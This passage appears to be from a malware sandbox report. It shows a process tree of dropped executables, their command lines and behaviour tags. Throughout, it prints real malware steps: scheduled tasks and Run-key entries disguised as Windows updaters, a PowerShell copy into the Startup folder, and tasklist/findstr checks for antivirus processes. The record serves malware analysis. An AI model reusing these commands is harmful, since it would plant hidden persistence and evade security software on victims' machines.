- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"20⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\pmmHnIOqfWFB.bat" "21⤵
-
C:\Windows\system32\chcp.comchcp 6500122⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"22⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\PPSztOcNdWvZ.bat" "23⤵
-
C:\Windows\system32\chcp.comchcp 6500124⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"24⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\qioPbk28B36S.bat" "25⤵
-
C:\Windows\system32\chcp.comchcp 6500126⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"26⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\NyEUAAPGiU8G.bat" "27⤵
-
C:\Windows\system32\chcp.comchcp 6500128⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe"C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe"C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.funletters.net/readme.htm4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3764 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3764 CREDAT:668687 /prefetch:25⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Diamotrix.exe"C:\Users\Admin\AppData\Local\Temp\Files\Diamotrix.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2240 -s 205⤵
-
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe"4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1976 -s 1845⤵
-
-
-
C:\Windows\system32\audiodg.exe"C:\Windows\system32\audiodg.exe"4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1260 -s 205⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe"C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Dk Dk.cmd & Dk.cmd & exit4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2174125⤵
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PlasmaProfessionalConstitutesGuide" Cheaper5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Mailing + Violin + Ethernet + Operated + Lunch + Useful 217412\N5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pifPossibly.pif N5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted2.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted2.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted2.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 524⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe"C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 2845⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ucloud.exe'4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\msf443.exe"C:\Users\Admin\AppData\Local\Temp\Files\msf443.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A238.tmp\A239.tmp\A23A.bat C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"4⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f5⤵
- Adds Run key to start application
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"5⤵
- Executes dropped EXE
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"6⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "WindowsDataUpdater" /sc ONLOGON /tr "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"5⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A69B.tmp\A69C.tmp\A69D.bat C:\Windows\system32\java.exe"6⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 17⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f7⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f7⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f7⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f7⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"8⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"7⤵
- Executes dropped EXE
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AEA7.tmp\AEA8.tmp\AEA9.bat C:\Windows\system32\java.exe"8⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 19⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f9⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f9⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f9⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f9⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"9⤵
- Executes dropped EXE
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"10⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"9⤵
- Executes dropped EXE
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"9⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B31A.tmp\B31B.tmp\B31C.bat C:\Windows\system32\java.exe"10⤵
-
C:\Windows\system32\timeout.exetimeout 111⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f11⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f11⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f11⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f11⤵
- Adds Run key to start application
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"11⤵
- Executes dropped EXE
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"12⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"11⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"11⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BA4A.tmp\BA4B.tmp\BA4C.bat C:\Windows\system32\java.exe"12⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 113⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f13⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f13⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f13⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f13⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"13⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"14⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"13⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"13⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C320.tmp\C321.tmp\C322.bat C:\Windows\system32\java.exe"14⤵
-
C:\Windows\system32\timeout.exetimeout 115⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f15⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f15⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f15⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f15⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"15⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"16⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"15⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"15⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CC16.tmp\CC17.tmp\CC18.bat C:\Windows\system32\java.exe"16⤵
-
C:\Windows\system32\timeout.exetimeout 117⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f17⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f17⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f17⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f17⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"17⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"18⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"17⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"17⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D1C0.tmp\D21F.tmp\D220.bat C:\Windows\system32\java.exe"18⤵
-
C:\Windows\system32\timeout.exetimeout 119⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f19⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f19⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f19⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f19⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"19⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"20⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"19⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"19⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D920.tmp\D921.tmp\D922.bat C:\Windows\system32\java.exe"20⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 121⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f21⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f21⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f21⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f21⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"21⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"22⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"21⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"21⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E15A.tmp\E15B.tmp\E15C.bat C:\Windows\system32\java.exe"22⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 123⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f23⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f23⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f23⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f23⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"23⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"24⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"23⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"23⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E975.tmp\E976.tmp\E977.bat C:\Windows\system32\java.exe"24⤵
-
C:\Windows\system32\timeout.exetimeout 125⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f25⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f25⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f25⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f25⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"25⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"26⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"25⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"25⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F096.tmp\F097.tmp\F098.bat C:\Windows\system32\java.exe"26⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 127⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f27⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f27⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f27⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f27⤵
- Adds Run key to start application
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"27⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"28⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"27⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"27⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F631.tmp\F632.tmp\F633.bat C:\Windows\system32\java.exe"28⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 129⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f29⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f29⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f29⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f29⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"29⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"30⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"29⤵
-
-
